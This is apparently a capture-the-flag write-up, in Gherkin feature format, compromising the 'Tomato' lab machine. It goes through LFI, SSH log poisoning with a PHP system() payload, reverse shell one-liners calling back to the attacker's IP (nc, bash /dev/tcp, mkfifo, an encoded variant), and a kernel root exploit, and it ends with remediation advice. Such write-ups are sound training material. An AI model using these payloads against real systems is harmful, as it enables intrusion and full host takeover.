## Version 1.4.1
## language: en

Feature:
  TOE:
    Tomato
  Category:
    Path Traversal
  Location:
    http://192.168.1.72/antibot_image/antibots/info.php
  CWE:
    CWE-22: Improper Limitation of a Pathname to a Restricted Directory
  Rule:
    REQ.173: Discard unsafe inputs
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Restrict the path of files to include

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Kali Linux        |  2020.3    |
    | Nmap              |  7.80      |
    | Python            |  2.7       |
    | SSH               |  7.9       |
    | Firefox           |  68.10     |
    | Dirb              |  2.22      |
    | Netcat            |  1.10      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 21:33 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.013s latency).
    Nmap scan report for 192.168.1.51
    Host is up (0.076s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.013s latency).
    Nmap scan report for 192.168.1.60
    Host is up (0.013s latency).
    Nmap scan report for 192.168.1.66
    Host is up (0.0015s latency).
    Nmap scan report for 192.168.1.71
    Host is up (0.00059s latency).
    Nmap scan report for 192.168.1.72
    Host is up (0.0013s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.0061s latency).
    Nmap done: 256 IP addresses (8 hosts up) scanned in 6.80 seconds
    """
    Then I determined that the ip of the machine is 192.168.1.72
    And it has three ports open: 21, 80, 8888
    """
    $ nmap -sS -sV 192.168.1.72
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 21:38 -05
    Nmap scan report for 192.168.1.72
    Host is up (0.00025s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    21/tcp   open  ftp     vsftpd 3.0.3
    80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
    8888/tcp open  http    nginx 1.10.3 (Ubuntu)
    MAC Address: 2C:6F:C9:1B:64:2F (Hon Hai Precision Ind.)
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 7.27 seconds
    """

  Scenario: Normal use case
    Given there is not much to see, nor can I interact with the site
    Then a normal use case is to see a tomato: [evidences](normal.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I only see the port 80 open (HTTP)
    Then I decide to analyze this service
    And the first thing I do is search for common directories on the server
    Then I do this with the "dirb" tool: [evidences](dirb.png)
    """
    $ dirb http://192.168.1.72/
    ...
    ==> DIRECTORY: http://192.168.1.72/antibot_image/
    """
    Then I get a directory called "antibot_image": [evidences](antibot.png)
    And inside this there is a subdirectory with several interesting files:
    """
    info.php
    ...
    license.txt
    readme.txt
    ...
    settings/
    uninstall.php
    """ [evidences](antibots.png)
    Then I did not find anything interesting in these files
    And seeing that the "info.php" file is on the server
    Then I decided to look at the source code for any clues
    And I found a GET parameter commented
    """
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Document</title>
    </head>
    <body>
    <!-- </?php include $_GET['image']; -->

    </body>
    </html>
    ...
    """
    Then the name of the parameter is "image"
    And by intuition I assumed that it receives a path from an image
    Then this is very common in Local File Inclusion (LFI) attacks
    And I decided to check if this site is vulnerable to LFI
    """
    http://192.168.1.72/antibot_image/antibots/info.php?image=/etc/passwd
    """
    And indeed, it is possible to do LFI [evidences](lfi.png)

  Scenario: Fail: Exploitation the LFI
    Given the server is vulnerable to LFI
    Then my idea was to use this vulnerability to get RCE
    And reading about how to get this I found the following page:
    """
    https://ironhackers.es/tutoriales/lfi-to-rce-envenenando-ssh-y-apache-logs/
    """
    And I learned that it is possible to achieve this by exploiting the logs
    Then this technique is known as Log Poisoning
    And take advantage of the logs of some services to execute code
    """
    Log Poisoning via Mail logs
    Log Poisoning via SSH logs
    Log Poisoning via Apache Logs
    etc
    """
    And not being very clear about this attack
    Then I tried to replicate the tutorial attack
    And check the file "/var/log/auth.log"
    Then I get information from SSH logs: [evidences](authlog.png)
    When I get a response I suspect this service
    And it's because initially Nmap did not detect this open service

  Scenario: Success: Get Remote Code Execution (RCE) via SSH Poisoning
    Given "/var/log/auth.log" logs SSH connections
    Then it is highly likely that the SSH service is open
    And to see it, I'll use nmap again with a more thorough scan
    """
    $ sudo nmap -sS -sV --script=default,vuln -p- -T5 192.168.1.72
    """
    Then I got the following response: [evidences](bestscan.png)
    And I realize that the SSH service runs on port 2211
    Then I have determined the port, I can continue with the attack
    And what I do is try connect to SSH with the following user:
    """
    $ ssh '<?php system($_GET['cmd']); ?>'@192.168.1.72 -p 2211
    """ [evidences](sshpoiso.png)
    Then the logs will register the user as invalid [evidences](invalid.png)
    And as it is running in "info.php" it will interpret the PHP code
    Then I get RCE with the GET parameter "cmd" [evidences](rce.png)
    """
    http://192.168.1.72/antibot_image/antibots/info.php?image=/var/log/auth.log
    &cmd=ls
    """
    And now that I have RCE the idea is to have a reverse shell

  Scenario: Fail: Getting reverse shell
    Given that the idea is to have a reverse shell
    Then I found a Cheat Sheet of ways to get a reverse shell
    """
    https://ironhackers.es/herramientas/reverse-shell-cheat-sheet/
    """
    And after I set my host on listening with Netcat
    """
    $ nc -lvp port
    """
    And test every possible way to get shell
    """
    ../info.php?image=/var/log/auth.log&cmd=nc host port
    ../info.php?image=/var/log/auth.log&cmd=bash -i >& /dev/tcp/host/port 0>&1
    ../info.php?image=/var/log/auth.log&cmd=php -r '$sock=fsockopen(host,port);
    exec("/bin/sh -i <&3 >&3 2>&3");'
    """
    Then I was unsuccessful in getting reverse shell

  Scenario: Success: Encoding reverse shell
    Given I can execute commands
    And I can't get a reverse shell
    Then the idea is encode the payload
    And since this works via URL, I need to perform an URLEncode
    When I try to encode the payload on this website: "www.urlencoder.org"
    """
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>
    &1|nc 192.168.1.71 1234 >/tmp/f
    """
    Then I get the following result: [evidences](badencode.png)
    And this is obviously not correctly encoding the characters
    Then I make a small python script to solve this problem
    """
    reverse_shell = payload
    encoded_reverse_shell = ""

    for i in range(len(reverse_shell)):
        encoded_reverse_shell += "%" + reverse_shell[i].encode("hex")

    print encoded_reverse_shell
    """
    And I get a correctly encoded payload: [evidences](goodencode.png)
    """
    %72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66
    %3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20
    %32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%31%2e%37%31%20%31%32
    %33%34%20%3e%2f%74%6d%70%2f%66
    """
    Then I execute this encoded payload
    And I get reverse shell [evidences](remoteshell.png)

  Scenario: Privilege Scalation
    Given I got shell
    Then the idea is to get root privileges
    And for that I must find some way to escalate privileges
    Then executing "uname -a" I realize it is a vulnerable kernel
    """
    kernel-4.10.0-28-generic
    """
    And there are several public exploits: [evidences](exploitskernel.png)
    Then I compile the CVE-2017-16995 exploit
    And when I run it I get root shell: [evidences](root.png)

  Scenario: Remediation
    Given this vulnerability is Path Traversal or LFI
    Then a general way to solve it is to take the relative path of the files
    And this can be implemented with the functions "realpath()" or "basepath()"
    """
    // based on https://stackoverflow.com/a/4205278

    $basepath = '/foo/bar/baz/';
    $realBase = realpath($basepath);

    $userpath = $basepath . $_GET['path'];
    $realUserPath = realpath($userpath);

    if ($realUserPath === false || strpos($realUserPath, $realBase) !== 0) {
        //Directory Traversal!
    } else {
        //Good path!
    }
    """

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.9/10 (High) - AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H/
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.7/10 (High) - E:H/RL:W/RC:C/
    Environmental:Unique and relevant attributes to a specific user environment
      7.7/10 (High) - CR:H/IR:H/AR:M/

  Scenario: Correlations
    No correlations have been found to this date {2020-10-02}
